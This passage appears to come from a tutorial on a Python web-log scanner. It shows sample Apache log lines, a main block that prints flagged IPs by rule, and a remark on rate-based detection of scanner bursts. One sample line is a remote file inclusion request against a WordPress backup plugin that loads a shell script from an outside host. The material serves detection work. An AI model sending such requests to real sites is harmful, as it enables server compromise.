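198.51.100.4 - - [10/Jun/2012:20:15:08 +0700] "GET /wp-content/plugins/BackUp/Archive.php?bkpwp_plugin_path=http://203.0.113.9/shell.txt? HTTP/1.1" 200 97
192.0.2.77 - - [10/Jun/2012:20:15:09 +0700] "GET /index.php?cat=5 HTTP/1.1" 200 8820
192.0.2.77 - - [10/Jun/2012:20:15:10 +0700] "GET /?s=union+workers+select+committee HTTP/1.1" 200 7301
"""

if __name__ == "__main__":
    for ip, rules in sorted(scan_log(SAMPLE_LOG, min_hits=1).items()):
        print("%-14s %s" % (ip, ", ".join(rules)))
```

Note that the scanner's HEAD requests to plugin paths (the fourth line) carry no payload and are not flagged by these rules; they would only stand out as a burst of 404s from one source, which is a separate rate-based rule.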
